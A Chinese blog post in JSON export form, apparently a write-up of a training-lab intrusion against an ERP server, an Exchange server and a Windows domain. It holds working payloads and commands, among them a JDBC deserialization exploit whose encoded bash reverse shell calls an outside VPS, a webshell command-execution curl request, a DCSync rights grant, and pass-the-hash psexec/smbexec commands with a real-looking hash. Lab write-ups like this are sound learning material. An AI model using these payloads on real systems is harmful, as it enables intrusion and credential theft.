{"id":238,"date":"2023-05-24T00:06:24","date_gmt":"2023-05-23T16:06:24","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=238"},"modified":"2023-05-24T00:08:31","modified_gmt":"2023-05-23T16:08:31","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95-exchange","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/238","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u9776\u573a\u8bb0\u5f55-Exchange"},"content":{"rendered":"

\"\"<\/p>\n

\u5168\u7aef\u53e3\u626b\u4e00\u624b<\/p>\n

\"\"<\/p>\n

\"\"<\/p>\n

\u6ca1\u4ec0\u4e48\u53ef\u5229\u7528\u7684\u670d\u52a1\uff0c\u8fd8\u662f\u770b\u770b\u8fdc\u5904\u768480\u548c8000\u5427<\/p>\n

8000\u7aef\u53e3lumia ERP\u5f31\u53e3\u4ee4admin:123456\u5373\u53ef\u767b\u5f55<\/p>\n

\u8fdb\u53bb\u540e\u53f3\u4e0a\u89d2\u70b9\u4e86\u4e00\u4e0b\u5b98\u65b9\u63d2\u4ef6\u8df3\u8f6c\u5230\u4e86\u534e\u590fERP\uff0c\u4e8e\u662f\u53bb\u627e\u4e00\u4e0b\u534e\u590fERP\u76f8\u5173\u7684\u6d1e<\/p>\n

\u6ca1\u627e\u5230\u5f88\u597d\u7684\u540e\u53f0rce\u4e4b\u7c7b\u7684\u6d1e\uff0c\u770b\u4e86\u4e00\u773c\u63d0\u793a\u53bb\u641c\u4e86\u4e00\u4e0bJDBC\uff0c\u7136\u540e\u5c31\u4e00\u773c\u4e01\u771f<\/p>\n

\u6210\u529f\u627e\u5230\u4e86\u5927\u54e5\u6587\u7ae0<\/a><\/p>\n

\u516c\u7f51\u8d77\u4e2a\u6076\u610fmysql --> https:\/\/github.com\/fnmsd\/MySQL_Fake_Server<\/a><\/p>\n

config.json(ysoserial-all.jar\u6765\u81eahttps:\/\/github.com\/frohoff\/ysoserial)<\/p>\n

{\n    "config":{\n        "ysoserialPath":"ysoserial-all.jar",\n        "javaBinPath":"java",\n        "fileOutputDir":".\/fileOutput\/",\n        "displayFileContentOnScreen":true,\n        "saveToFile":true\n    },\n    "fileread":{\n        "win_ini":"c:\\\\windows\\\\win.ini",\n        "win_hosts":"c:\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts",\n        "win":"c:\\\\windows\\\\",\n        "linux_passwd":"\/etc\/passwd",\n        "linux_hosts":"\/etc\/hosts",\n        "index_php":"index.php",\n        "ssrf":"https:\/\/www.baidu.com\/",\n        "__defaultFiles":["\/etc\/hosts","c:\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts"]\n    },\n    "yso":{\n        "Jdk7u21":["Jdk7u21","calc"],\n        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCA.....zMzIDA+JjE=}|{base64,-d}|{bash,-i}"]\n    }\n}<\/code><\/pre>\n
exp:<\/p>\n
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "VPS-IP", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAta......zMzIDA+JjE=}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }\n<\/code><\/pre>\n
bp\u76f4\u63a5\u53d1\u5305\uff0c\u6ce8\u610f\u8981url\u7f16\u7801\u4e0b<\/p>\n
\"\"<\/p>\n
\u6210\u529fgetshell\uff0c\u8fd8\u662froot\u6743\u9650<\/p>\n
\u5148\u4e0a\u7ebf\u5230viper\uff0c\u65b9\u4fbf\u540e\u7eed\u64cd\u4f5c\uff0c\u987a\u4fbf\u770b\u4e00\u4e0bflag<\/p>\n
\"\"<\/p>\n
\u770b\u4e0b\u7f51\u5361<\/p>\n
eth0      Link encap:Ethernet  HWaddr 00:16:3e:23:0c:59  \n          inet addr:172.22.3.12  Bcast:172.22.255.255  Mask:255.255.0.0\n          inet6 addr: fe80::216:3eff:fe23:c59\/64 Scope:Link\n          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1\n          RX packets:450985 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:369352 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1000 \n          RX bytes:162374033 (162.3 MB)  TX bytes:32947225 (32.9 MB)\n\nlo        Link encap:Local Loopback  \n          inet addr:127.0.0.1  Mask:255.0.0.0\n          inet6 addr: ::1\/128 Scope:Host\n          UP LOOPBACK RUNNING  MTU:65536  Metric:1\n          RX packets:8148 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:8148 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1 \n          RX bytes:1608086 (1.6 MB)  TX bytes:1608086 (1.6 MB)<\/code><\/pre>\n
\u7136\u540e\u4f20fscan\u626b\u4e0bC\u6bb5\uff0c\u987a\u4fbfviper\u505a\u4e2a\u4ee3\u7406<\/p>\n
shell .\/fscan -h 172.22.3.0\/24<\/code><\/pre>\n
\u7ed3\u679c\u5982\u4e0b<\/p>\n
meterpreter > shell -c '.\/fscan -h 172.22.3.0\/24'\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   <    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 172.22.3.12     is alive\n(icmp) Target 172.22.3.9      is alive\n(icmp) Target 172.22.3.2      is alive\n(icmp) Target 172.22.3.26     is alive\n[*] Icmp alive hosts len is: 4\n172.22.3.12:22 open\n172.22.3.9:8172 open\n172.22.3.26:445 open\n172.22.3.2:445 open\n172.22.3.9:445 open\n172.22.3.26:139 open\n172.22.3.9:443 open\n172.22.3.2:139 open\n172.22.3.9:139 open\n172.22.3.26:135 open\n172.22.3.2:135 open\n172.22.3.9:135 open\n172.22.3.9:81 open\n172.22.3.12:8000 open\n172.22.3.9:80 open\n172.22.3.12:80 open\n172.22.3.2:88 open\n172.22.3.9:808 open\n[*] alive ports len is: 18\nstart vulscan\n[*] NetInfo:\n[*]172.22.3.2\n   [->]XIAORANG-WIN16\n   [->]172.22.3.2\n[*] NetInfo:\n[*]172.22.3.9\n   [->]XIAORANG-EXC01\n   [->]172.22.3.9\n[*] NetInfo:\n[*]172.22.3.26\n   [->]XIAORANG-PC\n   [->]172.22.3.26\n[*] WebTitle: http:\/\/172.22.3.12:8000   code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.22.3.12:8000\/login.html\n[*] WebTitle: http:\/\/172.22.3.12        code:200 len:19813  title:lumia\n[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 \n[*] WebTitle: http:\/\/172.22.3.12:8000\/login.html code:200 len:5662   title:Lumia ERP\n[*] NetBios: 172.22.3.26     XIAORANG\\XIAORANG-PC           \n[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         cWindows Server 2016 Datacenter 14393 \n[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)\n[*] WebTitle: http:\/\/172.22.3.9:81      code:403 len:1157   title:403 - \u7981\u6b62\u8bbf\u95ee: \u8bbf\u95ee\u88ab\u62d2\u7edd\u3002\n[*] WebTitle: https:\/\/172.22.3.9:8172   code:404 len:0      title:None\n[*] WebTitle: http:\/\/172.22.3.9         code:403 len:0      title:None\n[*] WebTitle: https:\/\/172.22.3.9        code:302 len:0      title:None \u8df3\u8f6curl: https:\/\/172.22.3.9\/owa\/\n[*] WebTitle: https:\/\/172.22.3.9\/owa\/auth\/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook<\/code><\/pre>\n
\u7b80\u5355\u5206\u6790\u4e0b\uff0c\u53c8\u662f\u7ecf\u5178\u7684\u56db\u53f0\u673a\u5668<\/p>\n
172.22.3.12     \u62ff\u4e0b\n172.22.3.9      \u57df\u5185\u673a\u5668\n172.22.3.2      \u57df\u63a7\n172.22.3.26     \u57df\u5185\u673a\u5668<\/code><\/pre>\n
172.22.3.9 \u4e0a\u9762\u6709\u4e2aoutlook\uff0c\u5148\u770b\u770b<\/p>\n
\"\"<\/p>\n
exp\u76f4\u63a5\u6253<\/a>,\u731c\u4e00\u624b\u90ae\u4ef6\u540e\u7f00\u662fxiaorang.lab<\/p>\n
admin@xiaorang.lab\u6ca1\u6253\u901a\uff0cadministrator@xiaorang.lab\u6253\u901a\u4e86<\/p>\n
p4 python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab<\/code><\/pre>\n
\u6210\u529f\u5199\u5165shell<\/p>\n
\u6267\u884c\u547d\u4ee4\u7684\u547d\u4ee4\u5982\u4e0b<\/p>\n
curl --request POST --url https:\/\/172.22.3.9\/owa\/auth\/llmuo.aspx --header 'Content-Type: application\/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami \/all").stdout.readall())' -k<\/code><\/pre>\n
\u52a0\u4e2a\u4ee3\u7406\u518d\u6267\u884c\u6210\u529frce<\/p>\n
\"\"<\/p>\n
\u7136\u540e\u76f4\u63a5msf\u751f\u6210powershell\u4e00\u53e5\u8bdd\u4e0a\u7ebf\u5148\u4e0a\u7ebf\u4e0b\uff0c\u7136\u540e\u8bfbflag\"\"<\/p>\n
\u76f4\u63a5\u8fdb\u53bb\u6293\u4e00\u4e0bhash<\/p>\n
\u6293\u5230\u4e86\u57df\u5185\u7528\u6237zhangtong\u7684hash\u548c\u5f53\u524d\u7684system\u8d26\u6237\u7684hash<\/p>\n
BloodHound \u7b80\u5355\u5206\u6790\u4e00\u624b\u53d1\u73b0exchange\u8fd9\u53f0\u673a\u5668\u4e0a\u7684\u57df\u7528\u6237\u6709writeDacl\u6743\u9650\uff0c\u4e5f\u5c31\u662fzhangtong<\/p>\n
\u7ed9\u4ed6\u52a0\u4e0adcsync\u6743\u9650<\/p>\n
p4 python3 dacledit.py xiaorang.lab\/XIAORANG-EXC01\\$ -hashes : -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2<\/code><\/pre>\n
\u7136\u540epsexec\u76f4\u63a5\u8fdb\u57df\u63a7\u673a\u5668<\/p>\n
p4 python3 psexec.py administrator@172.22.3.2-hashes :7acbc9a6cOefd81bfa7d5a1d4238beb -codec gbk<\/code><\/pre>\n
\u62ff\u5230flag4<\/p>\n
\"\"<\/p>\n
\u8fd8\u5269\u4e00\u4e2aflag\uff0c\u5e94\u8be5\u572826\u90a3\u53f0\u673a\u5668\u4e0a<\/p>\n
\u76f4\u63a5smbexec\u6a2a\u5411\u8fc7\u53bb<\/p>\n
p4 python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab\/administrator@172.22.3.26 -codec gbk<\/code><\/pre>\n
admin\u91cc\u9762\u6ca1\u4e1c\u897f<\/p>\n
lumia\u7684\u684c\u9762\u4e0a\u6709\u4e00\u4e2asecret.zip\uff0c\u641e\u82b1\u6d3b\u662f\u5427<\/p>\n
\"\"<\/p>\n
\u8981\u65ad\u7f51\u4e86\uff0c\u76f4\u63a5\u7ffb\u770bwp<\/p>\n
\u62ff\u5230\u538b\u7f29\u5305\u540e\u4f1a\u53d1\u73b0\u6709\u5bc6\u7801\uff0c\u7136\u540e\u8fd9\u4e2alumia\u6709\u51e0\u4e2a\u90ae\u4ef6\uff0c\u63d0\u793a\u4e86\u5bc6\u7801\u662f\u624b\u673a\u53f7\uff0c\u5e76\u4e14\u7ed9\u51fa\u4e86\u4e00\u5806\u624b\u673a\u53f7\uff0c\u7206\u7834\u4e00\u4e0b\u5c31\u597d\u529b\uff0c\u62ff\u5230flag3<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
\u8d62!<\/p>\n
\u7ed3\u675f(<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5168\u7aef\u53e3\u626b\u4e00\u624b \u6ca1\u4ec0\u4e48\u53ef\u5229\u7528\u7684\u670d\u52a1\uff0c\u8fd8\u662f\u770b\u770b\u8fdc\u5904\u768480\u548c8000\u5427 8000\u7aef\u53e3lumia ERP\u5f31\u53e3\u4ee4admin:123456\u5373\u53ef\u767b\u5f55 \u8fdb\u53bb\u540e\u53f3\u4e0a\u89d2\u70b9\u4e86\u4e00\u4e0b\u5b98\u65b9\u63d2\u4ef6\u8df3\u8f6c\u5230\u4e86\u534e\u590fERP\uff0c\u4e8e\u662f\u53bb\u627e\u4e00\u4e0b\u534e\u590fERP\u76f8\u5173\u7684\u6d1e \u6ca1\u627e\u5230\u5f88\u597d\u7684\u540e\u53f0rce\u4e4b\u7c7b\u7684\u6d1e\uff0c\u770b\u4e86\u4e00\u773c\u63d0\u793a\u53bb\u641c\u4e86\u4e00\u4e0bJDBC\uff0c\u7136\u540e\u5c31\u4e00\u773c\u4e01\u771f \u6210\u529f\u627e\u5230\u4e86\u5927\u54e5\u6587\u7ae0 \u516c\u7f51\u8d77\u4e2a\u6076\u610fmysql –> https:\/\/github.com\/fnms […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,3],"tags":[],"class_list":["post-238","post","type-post","status-publish","format-standard","hentry","category-wp","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=238"}],"version-history":[{"count":2,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/238\/revisions"}],"predecessor-version":[{"id":240,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/238\/revisions\/240"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}